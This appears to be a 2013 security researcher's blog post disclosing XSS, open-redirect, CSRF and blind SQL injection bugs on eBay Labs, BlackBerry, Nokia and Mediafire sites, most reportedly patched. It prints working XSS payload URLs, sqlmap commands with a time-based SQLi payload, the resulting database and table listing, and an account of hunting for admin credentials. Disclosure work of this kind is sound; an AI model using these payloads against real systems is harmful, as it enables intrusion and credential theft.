Tuesday, June 4, 2013

XSS in Ebay Labs

I got 2 non persistent XSS bugs in ebay labs website. Below are the details,

URL: http://labs.ebay.com

Alert Box:

1st one- http://labs.ebay.com/erl/demoto/to- add=lp&origtitle=Mr.&qy=%27%20onmouseover%3dprompt %281337%29%20bad%3d%27&skipk=20&sq=pop&title=Mr.

2nd one- http://labs.ebay.com/publications/-wpa-paged=2&wpa- sort=%22%20onmouseover%3dprompt%281337%29%20bad%3d%22

Attack Details:URL encoded GET input qy was set to ' onmouseover=prompt(1337) bad='

The input is reflected inside a tag parameter between single quotes.

Affected items: /erl/demoto/to & /publications/

The impact of this vulnerability: Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

How to fix this vulnerability: Your script should filter metacharacters from user input.

This bug is reported to ebay and resolved now.

BlackBerry Multiple Bugs

images (259×195)

I had found 3 bugs in blackberry mobile site, m.blackberry.com & 2 bugs in developers site developer.blackberry.com.

Tested ON- OS: Windows 7 Browser: Google Chrome & Firefox (latest versions)

1. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting & or they are made to download malicious files.

A remote attacker can redirect users from your website to a specified URL. This problem may assist an attacker to conduct phishing attacks, trojan distribution, spammers.

=> Vulerable URL: http://m.blackberry.com/cps/rde/xchg/blackberrymobile2012/hs.xsl/-/index.html?

The above URL redirects to apple.com , which can be replaced with a malicious phishing URL or file containing Malware.

Fix: Your script should properly sanitize user input

2. Path disclosure Type: Information Disclosure URL: http://m.blackberry.com/cps/rde/xchg/blackberrymobile2012

The above URL is disclosing the path on the server: /cps/rde/xchg/SID-B461826F-730AD1C9/blackberrymobile2012

Fix: Deal with errors gracefully when a file is not located in the location is should be.

3.Important HTML forms without CSRF Protection- /at/de/feedback.html /at/de/polling1.html

I reported this to BlackBerry PSIRT already & the bugs are patched by now.

The 2 bugs in the developers site were use of SSL 2.0 deprecated protocol & SSL weak ciphers, which are not very critical.

Non persistant XSS in Nokia Subdomain

I had found 2 Non persistant XSS bugs in one Nokia subdomain, please look for the details below..

Subdomain: https://www.sales.nokia.com

Vulnerability type:  XSS

Affected Items:


Vulnerable URLs:

1. https://www.sales.nokia.com/mis/loginSubmit.do?CALLING_PAGE=&txtPasswd=&txtUsrName="</script>'<SCRIPT>alert("XSS")</SCRIPT>

2. https://www.sales.nokia.com/mis/forgotPwdSubmit.do?txtEmailID=&txtUserID=%22%3C/script%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E

Though it was not that easy you to find this XSS as it was a login page that was using POST requests to authenticate and there was a javascript blocking use of any special characters, So I used the firefox addon to tamper the request like putting admin@nokia.com in email and password 12345, then tampering the admin@nokia with a normal payload, still it didn't execute then I checked the source of the page, and noticed there is " and <script> tag open, so I modified the payload and it successfully executed.

Tested On- Windows 7 and Firefox Latest Version

I reported it to nokia then finally.


Mediafire Blind SQL Injection

I had found a critical Blind SQLi bug in mediafire knowledgebase. Which could be used to break into mediafire servers. please look below for details..

#Software Tybe: PHPKB Knowledge Base Software v7

#Tool Used: sqlmap on ubuntu

#Tested on: Ubuntu & Windows (Chrome & firefox)

#Commands used in SQL Map:

1>>   ./sqlmap.py -u http://knowledgebase.mediafire.com/article.php?id=72 -dbs

2>>   ./sqlmap.py -u http://knowledgebase.mediafire.com/article.php?id=72 -D knowledgebase --tables

Tybe: PHPKB Knowledge Base Software

Blind SQL Injection




Place: GET
Parameter: id

Type: AND/OR time-based blind
Title: Mysql > 5.0.11 AND time-based blind
Payload: id=72 AND SLEEP(5)


available databases [3]:

[*] information_schema
[*] knowledgebase
[*] test

Database: knowledgebase
[27 tables]
| phpkb_article_collaboration
| phpkb_article_versions      
| phpkb_article_visits        
| phpkb_articles              
| phpkb_attachments          
| phpkb_authors              
| phpkb_autosave              
| phpkb_categories            
| phpkb_comments              
| phpkb_custom_data          
| phpkb_custom_fields        
| phpkb_favorites            
| phpkb_glossary              
| phpkb_groups                
| phpkb_groups_categories    
| phpkb_groups_relations      
| phpkb_languages            
| phpkb_login_attempts        
| phpkb_news                  
| phpkb_ratings              
| phpkb_referrers            
| phpkb_relations            
| phpkb_saved_searches        
| phpkb_subscribers          
| phpkb_templates            
| phpkb_tickets              
| phpkb_translation_assignments

While digging their tables I found the admin details in the table _authors, it was getting a bit harder as sqlmap was not able to extract the column names completely. So, I made a guess and it was author_username & author_password. So I found the below details-


While testing the algorithm of the hash I found that it was md5 or domain cached credentials.
But I couldn't crack it, it was taking a hell lot of time.

So this was all, when I reported it to mediafire's VP they said its duplicate. And hence I made it public.